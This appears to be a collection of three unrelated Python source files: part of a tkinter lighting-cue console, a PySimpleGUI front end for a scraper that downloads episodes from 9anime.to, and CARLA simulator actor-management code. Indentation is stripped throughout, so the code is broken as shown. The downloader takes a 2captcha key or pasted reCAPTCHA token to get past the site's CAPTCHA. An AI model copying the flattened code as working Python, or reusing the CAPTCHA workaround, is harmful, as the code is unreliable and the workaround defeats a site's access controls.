self.e.insert(END, ' ')
elif k == "@":
self.e.insert(END, '@')
elif k == "a":
self.e.insert(END, '@')
elif k == "f":
ce = self.e.get()
if len(ce) > 0:
if ce.endswith('@'):
self.e.insert(END, '100')
else:
self.e.insert(END, '@100')
self.read_cmd(None)
elif k == "x":
ce = self.e.get()
if len(ce) > 0:
if ce.endswith('@'):
self.e.insert(END, '0')
else:
self.e.insert(END, '@0')
self.read_cmd(None)
elif k == "z":
ce = self.e.get()
if len(ce) > 0:
if ce.endswith('@'):
self.e.insert(END, '0')
else:
self.e.insert(END, '@0')
self.read_cmd(None)
elif k == "t":
ce = self.e.get()
if len(ce) == 0:
self.e.insert(END, 'time ')
else:
if ce.startswith('time') or ce.startswith('cue') or ce.startswith('rec'):
self.e.insert(END, ' ')
else:
self.e.insert(END, '>')
elif k == "r":
ce = self.e.get()
if len(ce) == 0:
self.e.insert(END, 'record ')
elif k == "q":
ce = self.e.get()
if len(ce) == 0:
self.e.insert(END, 'cue ')
elif k == "k":
ce = self.e.get()
if len(ce) == 0:
self.e.insert(END, 'delete cue ')
elif k == "p":
ce = self.e.get()
if len(ce) == 0:
self.e.insert(END, 'patch ')
elif k == "P":
ce = self.e.get()
if len(ce) == 0:
self.e.insert(END, 'dimmer_option ')
elif k == "o":
ce = self.e.get()
if len(ce) == 0:
self.e.insert(END, 'osc ')
elif k == "]":
ce = self.e.get()
if len(ce) == 0:
self.displayNextPage()
self.e.delete(0, END)
elif k == "[":
ce = self.e.get()
if len(ce) == 0:
self.displayPrevPage()
self.e.delete(0, END)
else:
self.e.insert(END, k)
if k.isdigit():
ce = self.e.get()
ai = ce.find('@')
if ai > 0 and ai == (len(ce)-3):
self.read_cmd(None)
if self.echo_osc_ip != "none":
self.cues.oscinterface.sendOSCstring(self.echo_osc_ip,self.echo_osc_port, "/1/cmdline", self.e.get())
#########################################
#
# This is called to read the command line and process its contents
#
#########################################
def read_cmd(self, event):
self.process_cmd(self.e.get())
#########################################
#
# This is the method that interprets commands entered in the command field
# The command string is split into tokens separated by a space
# the first token determines how the command is interpreted
# except in the case where the command line contains '@'
#
#########################################
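    # Illustrative command-line examples (based on the handlers below):
    #   "1@75"        set channel 1 to level 75
    #   "1>5@100"     set channels 1 through 5 to full
    #   "record 10"   record the live levels as cue 10
    #   "time 3 5"    set the current cue's up time to 3 and down time to 5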
def process_cmd(self, n):
cp = n.split("@")
if len(cp) == 2:
self.process_at_cmd(cp[0], cp[1])
self.e.delete(0,END)
return
cp = n.split(" ")
self.e.delete(0,END)
if n.startswith("rec"):
self.process_rec_cmd(n, cp)
elif n.startswith("tim"):
self.process_time_cmd(cp)
elif n.startswith("pat"):
self.process_patch_cmd(cp)
elif n.startswith("dim"):
self.process_dimmer_cmd(cp)
elif n.startswith("cue"):
self.process_cue_cmd(n, cp)
elif n.startswith("delete cue"):
self.process_delete_cue_cmd(cp)
elif n.startswith("osc"):
self.process_osc_cmd(cp)
#########################################
#
# This is called when the command line contains "@"
#
#########################################
def process_at_cmd(self, n, lp):
cp = n.split(">")
if len(cp) == 1:
cp = n.split(",")
if len(cp) == 1:
self.cues.livecue.setNewLevel(cp[0], lp)
else:
for i in range(0, len(cp)):
self.cues.livecue.setNewLevel(cp[i], lp)
elif len(cp) == 2:
for i in range(int(cp[0]), int(cp[1])+1):
self.cues.livecue.setNewLevel(i, lp)
self.updateDisplay()
#########################################
#
# This is called when the command line starts with "rec"
#
#########################################
def process_rec_cmd(self, n, cp):
if len(cp) >= 2:
if len(cp[1]) > 0:
recorded = self.cues.recordCueFromLive(float(cp[1]))
else:
recorded = self.cues.recordCueFromLive()
if recorded == False:
shouldreplace = tkmsg_box.askyesno("Cue Exists!", "Replace?")
if shouldreplace == True:
if len(cp) == 2:
recorded = self.cues.recordCueFromLive(float(cp[1]), 1)
else:
recorded = self.cues.recordCueFromLive(0,1)
if recorded == True and len(cp) > 2:
q = self.cues.cueForNumber(float(cp[1]))
if q != None:
self.cues.current = q
nn = 'time ' + n[8+len(cp[1]):]
self.process_cmd(nn)
self.updateCurrent()
#########################################
#
# This is called when the command line starts with "tim"
#
#########################################
def process_time_cmd(self, cp):
if self.cues.current != None:
if len(cp) == 2 and len(cp[1]) > 0:
self.cues.current.uptime = float(cp[1])
self.cues.current.downtime = float(cp[1])
self.updateCurrent()
elif len(cp) == 3:
self.cues.current.uptime = float(cp[1])
self.cues.current.downtime = float(cp[2])
self.updateCurrent()
elif len(cp) == 4:
self.cues.current.uptime = float(cp[1])
self.cues.current.downtime = float(cp[2])
self.cues.current.followtime = float(cp[3])
self.updateCurrent()
elif len(cp) == 5:
self.cues.current.uptime = float(cp[1])
self.cues.current.waituptime = float(cp[2])
self.cues.current.downtime = float(cp[3])
self.cues.current.waitdowntime = float(cp[4])
self.updateCurrent()
elif len(cp) == 6:
self.cues.current.uptime = float(cp[1])
self.cues.current.waituptime = float(cp[2])
self.cues.current.downtime = float(cp[3])
self.cues.current.waitdowntime = float(cp[4])
self.cues.current.followtime = float(cp[5])
self.updateCurrent()
#########################################
#
# This is called when the command line starts with "pat"
#
#########################################
def process_patch_cmd(self, cp):
if len(cp) == 3:
self.cues.patchAddressToChannel( int(cp[1]), int(cp[2]) )
elif len(cp) == 4:
self.cues.patchAddressToChannel( int(cp[1]), int(cp[2]), float(cp[3]) )
elif len(cp) == 5:
self.cues.patchAddressToChannel( int(cp[1]), int(cp[2]), float(cp[3]), int(cp[4]) )
#option 0=normal 1=non-dim 2=always on 3=no-master
else:
self.displayPatch()
#########################################
#
# This is called when the command line starts with "dim"
#
#########################################
def process_dimmer_cmd(self, cp):
if len(cp) == 3:
self.cues.setOptionForAddress( int(cp[1]), int(cp[2]) )
elif len(cp) == 4:
            self.cues.setOptionForAddress( int(cp[1]), int(cp[2]), int(cp[3]) )  # cp has four tokens here, so the option value is cp[3]
else:
self.displayDimmerOptions()
#########################################
#
# This is called when the command line starts with "cue"
#
#########################################
def process_cue_cmd(self, n, cp):
if len(cp) == 2:
if len(cp[1]) > 0 and cp[1] != '?':
q = self.cues.cueForNumber(float(cp[1]))
if q != None:
self.cues.current = q
self.cues.next = q
self.updateCurrent()
else:
self.displayCues()
elif len(cp) > 2:
q = self.cues.cueForNumber(float(cp[1]))
if q != None:
self.cues.current = q
nn = 'time ' + n[5+len(cp[1]):]
self.process_cmd(nn)
#########################################
#
# This is called when the command line starts with "delete cue"
#
#########################################
def process_delete_cue_cmd(self, cp):
if len(cp) == 2:
if len(cp[1]) > 0:
q = self.cues.cueForNumber(float(cp[1]))
if q != None:
shoulddelete = tkmsg_box.askyesno("Delete Cue!", "Are you sure?")
if shoulddelete == True:
self.cues.removeCue(q)
#########################################
#
# This is called when the command line starts with "osc"
#
#########################################
def process_osc_cmd(self, cp):
if self.cues.current != None:
if len(cp) == 2:
if len(cp[1]) > 0 and cp[1] != '?':
self.cues.current.oscstring = cp[1]
elif cp[1] == '?':
self.displayOSC()
else:
self.cues.current.oscstring = None
elif cp[1] == '?':
self.displayOSC()
#####################################################################################
#
# This is the main program
#
#####################################################################################
def windowwillclose():
app.menuQuit()
root = Tk()
root.protocol("WM_DELETE_WINDOW", windowwillclose)
app = App(root)
root.mainloop()
#root.destroy()
|
GUI.py
|
import queue
import PySimpleGUI as sg
from threading import Thread
sg.theme('Dark Amber')
downloader = None
scraper = None
def execute(downloader, scraper, start_epi, end_epi) :
scraper.main(start_epi, end_epi, downloader.token)
downloader.download()
class Anime_GUI() :
def __init__(self, gui_queue, downloader, scraper) :
self.gui_queue = gui_queue
self.downloader = downloader
self.scraper = scraper
self.window = None
def create_ui(self) :
layout = [
[sg.Text("General Details",size=(15,1)),sg.Text("_"*60, pad=(0,15))],
[sg.Text("Anime URL (9anime.to)", text_color="white", size=(25,1)), sg.InputText(key="anime_url")],
[sg.Text("Animefillerlist URL", text_color="white", size=(25,1)), sg.InputText(key="names_url")],
[sg.Text("Save To", size=(25,1), text_color="white"), sg.InputText(key="location"), sg.FolderBrowse()],
[sg.Text("Episodes Details",size=(15,1)),sg.Text("_"*60, pad=(0,15))],
[sg.Text("From", text_color="white"), sg.InputText(key="start_epi", size=(5,1)), sg.Text("To", text_color="white"), sg.InputText(key="end_epi", size=(5,1)), sg.Text("Download Filler Episodes?", text_color="white"), sg.Combo(["Yes", "No"], size=(4,1), default_value="Yes", key="isFiller"), sg.Text("Threads", text_color="white"), sg.Spin([i for i in range(1,21)],initial_value=1, size=(3,1), key="threads")],
[],
[sg.Text("Optional Settings (Fill this if you don't have 2captcha key)",size=(45,1)),sg.Text("_"*25, pad=(0,15))],
[sg.Text("Recaptcha Token (Optional)", text_color="white", size=(25,1)), sg.Multiline(size=(45, 4), key="token")],
[sg.Column([[sg.Button("Download", size=(10,1))]], justification="right", pad=(35,5))],
[],
[sg.Text("Messages")],
[sg.Multiline(size=(None, 8), key="txt_msg", disabled=True)],
[]
]
self.window = sg.Window("Anime Downloader v0.1.1-alpha", layout)
def check_messages(self, values) :
txt = values["txt_msg"].strip()
while True :
try: # see if something has been posted to Queue
message = self.gui_queue.get_nowait()
except queue.Empty: # get_nowait() will get exception when Queue is empty
break # break from the loop if no more messages are queued up
# if message received from queue, display the message in the Window
if message:
txt += "\n" + message
self.window['txt_msg'].update(txt)
# do a refresh because could be showing multiple messages before next Read
self.window.refresh()
# print(message)
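        # Worker code is expected to report progress by putting strings on the
        # shared queue (illustrative sketch; assumes the downloader/scraper keep
        # the ``gui`` reference assigned in run() below), e.g.:
        #   self.gui.gui_queue.put("[INFO] : Episode 1 downloaded")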
def run(self) :
self.create_ui()
while True :
# wait for up to 100 ms for a GUI event
event, values = self.window.read(timeout=100)
if event in (None, 'Exit'):
break
if event == "Download" :
self.scraper.download_9anime_url = values["anime_url"]
self.scraper.title_url = values["names_url"]
if values["names_url"] != "" :
self.downloader.titles = True
if values["isFiller"] == "Yes":
self.scraper.isFiller = True
else :
self.scraper.isFiller = False
tok = values["token"].rstrip()
if tok != "":
self.downloader.token = tok
directory = values["location"]
if directory != "" :
directory = directory.replace("\\", "/")
if not directory.endswith("/") :
directory+="/"
self.downloader.directory = directory
self.downloader.threads = values["threads"]
self.scraper.gui = self
self.downloader.gui = self
self.window["txt_msg"].update("[INFO] : Download started!")
self.window.refresh()
thread = Thread(target=execute, args=(self.downloader, self.scraper, values["start_epi"], values["end_epi"]), daemon=True)
thread.start()
self.check_messages(values)
self.window.close()
|
carla_data_provider.py
|
#!/usr/bin/env python
# Copyright (c) 2018-2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""
This module provides all frequently used data from CARLA via
local buffers to avoid blocking calls to CARLA
"""
from __future__ import print_function
import math
import random
import re
from threading import Thread
import carla
from six import iteritems
def calculate_velocity(actor):
"""
    Method to calculate the velocity of an actor
"""
velocity_squared = actor.get_velocity().x**2
velocity_squared += actor.get_velocity().y**2
return math.sqrt(velocity_squared)
class CarlaDataProvider(object): # pylint: disable=too-many-public-methods
"""
This class provides access to various data of all registered actors
It buffers the data and updates it on every CARLA tick
Currently available data:
- Absolute velocity
- Location
- Transform
Potential additions:
- Acceleration
In addition it provides access to the map and the transform of all traffic lights
"""
_actor_velocity_map = dict()
_actor_location_map = dict()
_actor_transform_map = dict()
_traffic_light_map = dict()
_map = None
_world = None
_sync_flag = False
_ego_vehicle_route = None
@staticmethod
def register_actor(actor):
"""
Add new actor to dictionaries
If actor already exists, throw an exception
"""
if actor in CarlaDataProvider._actor_velocity_map:
raise KeyError(
"Vehicle '{}' already registered. Cannot register twice!".format(actor.id))
else:
CarlaDataProvider._actor_velocity_map[actor] = 0.0
if actor in CarlaDataProvider._actor_location_map:
raise KeyError(
"Vehicle '{}' already registered. Cannot register twice!".format(actor.id))
else:
CarlaDataProvider._actor_location_map[actor] = None
if actor in CarlaDataProvider._actor_transform_map:
raise KeyError(
"Vehicle '{}' already registered. Cannot register twice!".format(actor.id))
else:
CarlaDataProvider._actor_transform_map[actor] = None
@staticmethod
def register_actors(actors):
"""
Add new set of actors to dictionaries
"""
for actor in actors:
CarlaDataProvider.register_actor(actor)
@staticmethod
def perform_carla_tick(timeout=5.0):
"""
Send tick() command to CARLA and wait for at
most timeout seconds to let tick() return
Note: This is a workaround as CARLA tick() has no
timeout functionality
"""
t = Thread(target=CarlaDataProvider._world.tick)
t.daemon = True
t.start()
t.join(float(timeout))
if t.is_alive():
raise RuntimeError("Timeout of CARLA tick command")
@staticmethod
def on_carla_tick():
"""
Callback from CARLA
"""
for actor in CarlaDataProvider._actor_velocity_map:
if actor is not None and actor.is_alive:
CarlaDataProvider._actor_velocity_map[actor] = calculate_velocity(actor)
for actor in CarlaDataProvider._actor_location_map:
if actor is not None and actor.is_alive:
CarlaDataProvider._actor_location_map[actor] = actor.get_location()
for actor in CarlaDataProvider._actor_transform_map:
if actor is not None and actor.is_alive:
CarlaDataProvider._actor_transform_map[actor] = actor.get_transform()
@staticmethod
def get_velocity(actor):
"""
returns the absolute velocity for the given actor
"""
for key in CarlaDataProvider._actor_velocity_map:
if key.id == actor.id:
return CarlaDataProvider._actor_velocity_map[key]
# We are intentionally not throwing here
# This may cause exception loops in py_trees
print('{}.get_velocity: {} not found!' .format(__name__, actor))
return 0.0
@staticmethod
def get_location(actor):
"""
returns the location for the given actor
"""
for key in CarlaDataProvider._actor_location_map:
if key.id == actor.id:
return CarlaDataProvider._actor_location_map[key]
# We are intentionally not throwing here
# This may cause exception loops in py_trees
print('{}.get_location: {} not found!' .format(__name__, actor))
return None
@staticmethod
def get_transform(actor):
"""
returns the transform for the given actor
"""
for key in CarlaDataProvider._actor_transform_map:
if key.id == actor.id:
return CarlaDataProvider._actor_transform_map[key]
# We are intentionally not throwing here
# This may cause exception loops in py_trees
print('{}.get_transform: {} not found!' .format(__name__, actor))
return None
@staticmethod
def prepare_map():
"""
        This function sets the current map and loads all traffic lights for this map into
_traffic_light_map
"""
if CarlaDataProvider._map is None:
CarlaDataProvider._map = CarlaDataProvider._world.get_map()
# Parse all traffic lights
CarlaDataProvider._traffic_light_map.clear()
for traffic_light in CarlaDataProvider._world.get_actors().filter('*traffic_light*'):
if traffic_light not in CarlaDataProvider._traffic_light_map.keys():
CarlaDataProvider._traffic_light_map[traffic_light] = traffic_light.get_transform()
else:
raise KeyError(
"Traffic light '{}' already registered. Cannot register twice!".format(traffic_light.id))
@staticmethod
def get_world():
"""
Return world
"""
return CarlaDataProvider._world
@staticmethod
def is_sync_mode():
"""
        @return true if synchronous mode is used
"""
return CarlaDataProvider._sync_flag
@staticmethod
def set_world(world):
"""
Set the world and world settings
"""
CarlaDataProvider._world = world
settings = world.get_settings()
CarlaDataProvider._sync_flag = settings.synchronous_mode
CarlaDataProvider._map = CarlaDataProvider._world.get_map()
@staticmethod
def get_map(world=None):
"""
Get the current map
"""
if CarlaDataProvider._map is None:
if world is None:
if CarlaDataProvider._world is None:
                    raise ValueError("class member 'world' not initialized yet")
else:
CarlaDataProvider._map = CarlaDataProvider._world.get_map()
else:
CarlaDataProvider._map = world.get_map()
return CarlaDataProvider._map
@staticmethod
def annotate_trafficlight_in_group(traffic_light):
"""
Get dictionary with traffic light group info for a given traffic light
"""
dict_annotations = {'ref': [], 'opposite': [], 'left': [], 'right': []}
# Get the waypoints
ref_location = CarlaDataProvider.get_trafficlight_trigger_location(traffic_light)
ref_waypoint = CarlaDataProvider.get_map().get_waypoint(ref_location)
ref_yaw = ref_waypoint.transform.rotation.yaw
group_tl = traffic_light.get_group_traffic_lights()
for target_tl in group_tl:
if traffic_light.id == target_tl.id:
dict_annotations['ref'].append(target_tl)
else:
# Get the angle between yaws
target_location = CarlaDataProvider.get_trafficlight_trigger_location(target_tl)
target_waypoint = CarlaDataProvider.get_map().get_waypoint(target_location)
target_yaw = target_waypoint.transform.rotation.yaw
diff = (target_yaw - ref_yaw) % 360
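                # Classify the target light by the relative heading of its trigger-volume
                # waypoint: lights facing roughly the same way as the reference
                # (diff <= 30 or diff > 330 degrees) are skipped, ~270 degrees is 'right',
                # ~180 degrees is 'opposite', and ~90 degrees is 'left'.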
if diff > 330:
continue
elif diff > 225:
dict_annotations['right'].append(target_tl)
elif diff > 135.0:
dict_annotations['opposite'].append(target_tl)
elif diff > 30:
dict_annotations['left'].append(target_tl)
return dict_annotations
@staticmethod
def get_trafficlight_trigger_location(traffic_light): # pylint: disable=invalid-name
"""
        Calculates the location of the trigger volume of the given traffic light
"""
def rotate_point(point, angle):
"""
rotate a given point by a given angle
"""
x_ = math.cos(math.radians(angle)) * point.x - math.sin(math.radians(angle)) * point.y
            y_ = math.sin(math.radians(angle)) * point.x + math.cos(math.radians(angle)) * point.y
return carla.Vector3D(x_, y_, point.z)
base_transform = traffic_light.get_transform()
base_rot = base_transform.rotation.yaw
area_loc = base_transform.transform(traffic_light.trigger_volume.location)
area_ext = traffic_light.trigger_volume.extent
point = rotate_point(carla.Vector3D(0, 0, area_ext.z), base_rot)
point_location = area_loc + carla.Location(x=point.x, y=point.y)
return carla.Location(point_location.x, point_location.y, point_location.z)
@staticmethod
def update_light_states(ego_light, annotations, states, freeze=False, timeout=1000000000):
"""
Update traffic light states
"""
reset_params = []
for state in states:
relevant_lights = []
if state == 'ego':
relevant_lights = [ego_light]
else:
relevant_lights = annotations[state]
for light in relevant_lights:
prev_state = light.get_state()
prev_green_time = light.get_green_time()
prev_red_time = light.get_red_time()
prev_yellow_time = light.get_yellow_time()
reset_params.append({'light': light,
'state': prev_state,
'green_time': prev_green_time,
'red_time': prev_red_time,
'yellow_time': prev_yellow_time})
light.set_state(states[state])
if freeze:
light.set_green_time(timeout)
light.set_red_time(timeout)
light.set_yellow_time(timeout)
return reset_params
@staticmethod
def reset_lights(reset_params):
"""
Reset traffic lights
"""
for param in reset_params:
param['light'].set_state(param['state'])
param['light'].set_green_time(param['green_time'])
param['light'].set_red_time(param['red_time'])
param['light'].set_yellow_time(param['yellow_time'])
@staticmethod
def get_next_traffic_light(actor, use_cached_location=True):
"""
returns the next relevant traffic light for the provided actor
"""
CarlaDataProvider.prepare_map()
if not use_cached_location:
location = actor.get_transform().location
else:
location = CarlaDataProvider.get_location(actor)
waypoint = CarlaDataProvider.get_map().get_waypoint(location)
# Create list of all waypoints until next intersection
list_of_waypoints = []
while waypoint and not waypoint.is_intersection:
list_of_waypoints.append(waypoint)
waypoint = waypoint.next(2.0)[0]
# If the list is empty, the actor is in an intersection
if not list_of_waypoints:
return None
relevant_traffic_light = None
distance_to_relevant_traffic_light = float("inf")
for traffic_light in CarlaDataProvider._traffic_light_map:
if hasattr(traffic_light, 'trigger_volume'):
tl_t = CarlaDataProvider._traffic_light_map[traffic_light]
transformed_tv = tl_t.transform(traffic_light.trigger_volume.location)
distance = carla.Location(transformed_tv).distance(list_of_waypoints[-1].transform.location)
if distance < distance_to_relevant_traffic_light:
relevant_traffic_light = traffic_light
distance_to_relevant_traffic_light = distance
return relevant_traffic_light
@staticmethod
def set_ego_vehicle_route(route):
"""
Set the route of the ego vehicle
@todo extend ego_vehicle_route concept to support multi ego_vehicle scenarios
"""
CarlaDataProvider._ego_vehicle_route = route
@staticmethod
def get_ego_vehicle_route():
"""
returns the currently set route of the ego vehicle
Note: Can be None
"""
return CarlaDataProvider._ego_vehicle_route
@staticmethod
def find_weather_presets():
"""
Get weather presets from CARLA
"""
rgx = re.compile('.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)')
name = lambda x: ' '.join(m.group(0) for m in rgx.finditer(x))
presets = [x for x in dir(carla.WeatherParameters) if re.match('[A-Z].+', x)]
return [(getattr(carla.WeatherParameters, x), name(x)) for x in presets]
@staticmethod
def cleanup():
"""
Cleanup and remove all entries from all dictionaries
"""
CarlaDataProvider._actor_velocity_map.clear()
CarlaDataProvider._actor_location_map.clear()
CarlaDataProvider._actor_transform_map.clear()
CarlaDataProvider._traffic_light_map.clear()
CarlaDataProvider._map = None
CarlaDataProvider._world = None
CarlaDataProvider._sync_flag = False
CarlaDataProvider._ego_vehicle_route = None
class CarlaActorPool(object):
"""
The CarlaActorPool caches all scenario relevant actors.
    It works similarly to a singleton.
An actor can be created via "request_actor", and access
is possible via "get_actor_by_id".
Using CarlaActorPool, actors can be shared between scenarios.
"""
_client = None
_world = None
_carla_actor_pool = dict()
_spawn_points = None
_spawn_index = 0
_blueprint_library = None
@staticmethod
def set_client(client):
"""
Set the CARLA client
"""
CarlaActorPool._client = client
@staticmethod
def set_world(world):
"""
Set the CARLA world
"""
CarlaActorPool._world = world
CarlaActorPool._blueprint_library = world.get_blueprint_library()
CarlaActorPool.generate_spawn_points()
@staticmethod
def get_actors():
"""
Return list of actors and their ids
Note: iteritems from six is used to allow compatibility with Python 2 and 3
"""
return iteritems(CarlaActorPool._carla_actor_pool)
@staticmethod
def generate_spawn_points():
"""
Generate spawn points for the current map
"""
spawn_points = list(CarlaDataProvider.get_map(CarlaActorPool._world).get_spawn_points())
random.shuffle(spawn_points)
CarlaActorPool._spawn_points = spawn_points
CarlaActorPool._spawn_index = 0
@staticmethod
def create_blueprint(model, rolename='scenario', hero=False, autopilot=False, color=None, actor_category="car"):
"""
Function to setup the most relevant actor parameters,
incl. spawn point and vehicle model.
"""
_actor_blueprint_categories = {
'car': 'vehicle.tesla.model3',
'van': 'vehicle.volkswagen.t2',
'truck': 'vehicle.carlamotors.carlacola',
'trailer': '',
'semitrailer': '',
'bus': 'vehicle.volkswagen.t2',
'motorbike': 'vehicle.kawasaki.ninja',
'bicycle': 'vehicle.diamondback.century',
'train': '',
'tram': '',
'pedestrian': 'walker.pedestrian.0001',
}
# Get vehicle by model
try:
blueprint = random.choice(CarlaActorPool._blueprint_library.filter(model))
except IndexError:
# The model is not part of the blueprint library. Let's take a default one for the given category
bp_filter = "vehicle.*"
new_model = _actor_blueprint_categories[actor_category]
if new_model != '':
bp_filter = new_model
print("WARNING: Actor model {} not available. Using instead {}".format(model, new_model))
blueprint = random.choice(CarlaActorPool._blueprint_library.filter(bp_filter))
if color:
if not blueprint.has_attribute('color'):
print(
"WARNING: Cannot set Color ({}) for actor {} due to missing blueprint attribute".format(
color, blueprint.id))
else:
default_color_rgba = blueprint.get_attribute('color').as_color()
default_color = '({}, {}, {})'.format(default_color_rgba.r, default_color_rgba.g, default_color_rgba.b)
try:
blueprint.set_attribute('color', color)
except ValueError:
# Color can't be set for this vehicle
print("WARNING: Color ({}) cannot be set for actor {}. Using instead: ({})".format(
color, blueprint.id, default_color))
blueprint.set_attribute('color', default_color)
# is it a pedestrian? -> make it mortal
if blueprint.has_attribute('is_invincible'):
blueprint.set_attribute('is_invincible', 'false')
if autopilot:
blueprint.set_attribute('role_name', 'autopilot')
else:
blueprint.set_attribute('role_name', rolename)
return blueprint
@staticmethod
def handle_actor_batch(batch):
"""
Forward a CARLA command batch to spawn actors to CARLA, and gather the responses
returns list of actors on success, none otherwise
"""
actors = []
sync_mode = CarlaActorPool._world.get_settings().synchronous_mode
if CarlaActorPool._client and batch is not None:
responses = CarlaActorPool._client.apply_batch_sync(batch, sync_mode)
else:
return None
# wait for the actors to be spawned properly before we do anything
if sync_mode:
CarlaDataProvider.perform_carla_tick()
else:
CarlaActorPool._world.wait_for_tick()
actor_ids = []
if responses:
for response in responses:
if not response.error:
actor_ids.append(response.actor_id)
carla_actors = CarlaActorPool._world.get_actors(actor_ids)
for actor in carla_actors:
actors.append(actor)
return actors
@staticmethod
def setup_actor(model, spawn_point, rolename='scenario', hero=False, autopilot=False,
random_location=False, color=None, actor_category="car"):
"""
Function to setup the most relevant actor parameters,
incl. spawn point and vehicle model.
"""
blueprint = CarlaActorPool.create_blueprint(model, rolename, hero, autopilot, color, actor_category)
if random_location:
actor = None
while not actor:
spawn_point = random.choice(CarlaActorPool._spawn_points)
actor = CarlaActorPool._world.try_spawn_actor(blueprint, spawn_point)
else:
# slightly lift the actor to avoid collisions with ground when spawning the actor
# DO NOT USE spawn_point directly, as this will modify spawn_point permanently
_spawn_point = carla.Transform(carla.Location(), spawn_point.rotation)
_spawn_point.location.x = spawn_point.location.x
_spawn_point.location.y = spawn_point.location.y
_spawn_point.location.z = spawn_point.location.z + 0.2
actor = CarlaActorPool._world.try_spawn_actor(blueprint, _spawn_point)
if actor is None:
raise RuntimeError(
"Error: Unable to spawn vehicle {} at {}".format(blueprint.id, spawn_point))
        else:
            # Let's deactivate the autopilot of the actor if it is a vehicle
            if 'vehicle' in actor.type_id:
                actor.set_autopilot(autopilot)
# wait for the actor to be spawned properly before we do anything
if CarlaActorPool._world.get_settings().synchronous_mode:
CarlaDataProvider.perform_carla_tick()
else:
CarlaActorPool._world.wait_for_tick()
return actor
@staticmethod
def setup_actors(actor_list):
"""
Function to setup a complete list of actors
"""
SpawnActor = carla.command.SpawnActor # pylint: disable=invalid-name
PhysicsCommand = carla.command.SetSimulatePhysics # pylint: disable=invalid-name
FutureActor = carla.command.FutureActor # pylint: disable=invalid-name
ApplyTransform = carla.command.ApplyTransform # pylint: disable=invalid-name
batch = []
actors = []
for actor in actor_list:
blueprint = CarlaActorPool.create_blueprint(model=actor.model,
rolename=actor.rolename,
hero=False,
autopilot=actor.autopilot,
color=actor.color,
actor_category=actor.category)
# slightly lift the actor to avoid collisions with ground when spawning the actor
# DO NOT USE spawn_point directly, as this will modify spawn_point permanently
_spawn_point = carla.Transform(carla.Location(), actor.transform.rotation)
_spawn_point.location.x = actor.transform.location.x
_spawn_point.location.y = actor.transform.location.y
_spawn_point.location.z = actor.transform.location.z + 0.2
if 'physics' in actor.args and actor.args['physics'] == "off":
command = SpawnActor(blueprint, _spawn_point).then(
ApplyTransform(FutureActor, actor.transform)).then(PhysicsCommand(FutureActor, False))
elif actor.category == 'misc':
command = SpawnActor(blueprint, _spawn_point).then(PhysicsCommand(FutureActor, True))
else:
command = SpawnActor(blueprint, _spawn_point)
batch.append(command)
actors = CarlaActorPool.handle_actor_batch(batch)
return actors
@staticmethod
def setup_batch_actors(model, amount, spawn_point, hero=False, autopilot=False, random_location=False):
"""
Function to setup a batch of actors with the most relevant parameters,
incl. spawn point and vehicle model.
"""
SpawnActor = carla.command.SpawnActor # pylint: disable=invalid-name
SetAutopilot = carla.command.SetAutopilot # pylint: disable=invalid-name
FutureActor = carla.command.FutureActor # pylint: disable=invalid-name
blueprint_library = CarlaActorPool._world.get_blueprint_library()
if not hero:
hero_actor = CarlaActorPool.get_hero_actor()
else:
hero_actor = None
batch = []
for _ in range(amount):
# Get vehicle by model
blueprint = random.choice(blueprint_library.filter(model))
# is it a pedestrian? -> make it mortal
if blueprint.has_attribute('is_invincible'):
blueprint.set_attribute('is_invincible', 'false')
if hero:
blueprint.set_attribute('role_name', 'hero')
elif autopilot:
blueprint.set_attribute('role_name', 'autopilot')
else:
blueprint.set_attribute('role_name', 'scenario')
if random_location:
if CarlaActorPool._spawn_index >= len(CarlaActorPool._spawn_points):
CarlaActorPool._spawn_index = len(CarlaActorPool._spawn_points)
spawn_point = None
elif hero_actor is not None:
spawn_point = CarlaActorPool._spawn_points[CarlaActorPool._spawn_index]
CarlaActorPool._spawn_index += 1
                    # if the spawn point is too close to the hero we just ignore this position
if hero_actor.get_transform().location.distance(spawn_point.location) < 8.0:
spawn_point = None
else:
spawn_point = CarlaActorPool._spawn_points[CarlaActorPool._spawn_index]
CarlaActorPool._spawn_index += 1
if spawn_point:
batch.append(SpawnActor(blueprint, spawn_point).then(SetAutopilot(FutureActor, autopilot)))
actor_list = CarlaActorPool.handle_actor_batch(batch)
return actor_list
@staticmethod
def request_new_batch_actors(model, amount, spawn_point, hero=False, autopilot=False, random_location=False):
"""
This method tries to create a new actor. If this was
successful, the new actor is returned, None otherwise.
"""
actors = CarlaActorPool.setup_batch_actors(model, amount, spawn_point, hero, autopilot, random_location)
if actors is None:
return None
for actor in actors:
CarlaActorPool._carla_actor_pool[actor.id] = actor
return actors
@staticmethod
def request_new_actor(model, spawn_point, rolename='scenario', hero=False, autopilot=False,
random_location=False, color=None, actor_category=None):
"""
This method tries to create a new actor. If this was
successful, the new actor is returned, None otherwise.
"""
actor = CarlaActorPool.setup_actor(
model, spawn_point, rolename, hero, autopilot, random_location, color, actor_category)
if actor is None:
return None
CarlaActorPool._carla_actor_pool[actor.id] = actor
return actor
@staticmethod
def request_new_actors(actor_list):
"""
This method tries to create a list of new actors. If this was
successful, the new actors are returned, None otherwise.
"""
actors = CarlaActorPool.setup_actors(actor_list)
if actors is None:
return None
for actor in actors:
CarlaActorPool._carla_actor_pool[actor.id] = actor
return actors
@staticmethod
def actor_id_exists(actor_id):
"""
Check if a certain id is still at the simulation
"""
if actor_id in CarlaActorPool._carla_actor_pool:
return True
return False
@staticmethod
def get_hero_actor():
"""
Get the actor object of the hero actor if it exists, returns none otherwise.
"""
for actor_id in CarlaActorPool._carla_actor_pool:
if CarlaActorPool._carla_actor_pool[actor_id].attributes['role_name'] == 'hero':
return CarlaActorPool._carla_actor_pool[actor_id]
return None
@staticmethod
def get_actor_by_id(actor_id):
"""
Get an actor from the pool by using its ID. If the actor
does not exist, None is returned.
"""
if actor_id in CarlaActorPool._carla_actor_pool:
return CarlaActorPool._carla_actor_pool[actor_id]
print("Non-existing actor id {}".format(actor_id))
return None
@staticmethod
def remove_actor_by_id(actor_id):
"""
Remove an actor from the pool using its ID
"""
if actor_id in CarlaActorPool._carla_actor_pool:
CarlaActorPool._carla_actor_pool[actor_id].destroy()
CarlaActorPool._carla_actor_pool[actor_id] = None
CarlaActorPool._carla_actor_pool.pop(actor_id)
else:
print("Trying to remove a non-existing actor id {}".format(actor_id))
@staticmethod
def cleanup():
"""
Cleanup the actor pool, i.e. remove and destroy all actors
"""
